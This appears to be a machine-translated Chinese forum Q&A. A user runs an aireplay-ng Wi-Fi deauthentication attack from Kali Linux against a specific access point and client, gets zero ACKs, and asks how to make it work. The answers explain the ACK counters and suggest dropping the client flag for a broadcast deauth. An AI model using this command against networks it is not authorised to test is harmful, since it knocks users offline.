我已经在我的Kali Linux中使用了“Deauth”攻击,但是没有发送任何确认
root@kali:~# aireplay-ng --deauth 200 -a 6A:15:90:F4:4D:82 -c F8:F1:B6:E8:E6:2A --ignore-negative-one wlan0mon
12:26:31 Waiting for beacon frame (BSSID: 6A:15:90:F4:4D:82) on channel 9
12:26:32 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:32 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:41 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:42 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:52 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:52 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:02 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:03 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:13 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:13 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
我如何使用此攻击?
由于
答案 0 :(得分:2)
那么[28 | 63 ACKs]是什么意思?
这意味着: [从客户端收到的确认信息|从AP收到的确认] 在这种情况下,从客户端接收28个ACK,从AP接收63个ACK
但在您的情况下零值肯定告诉客户端和/或AP没有听到您的数据包。 可能没有人(客户端)与目标AP连接。
答案 1 :(得分:-1)
我知道这很旧,但是只要删除“ -c”,你就可以了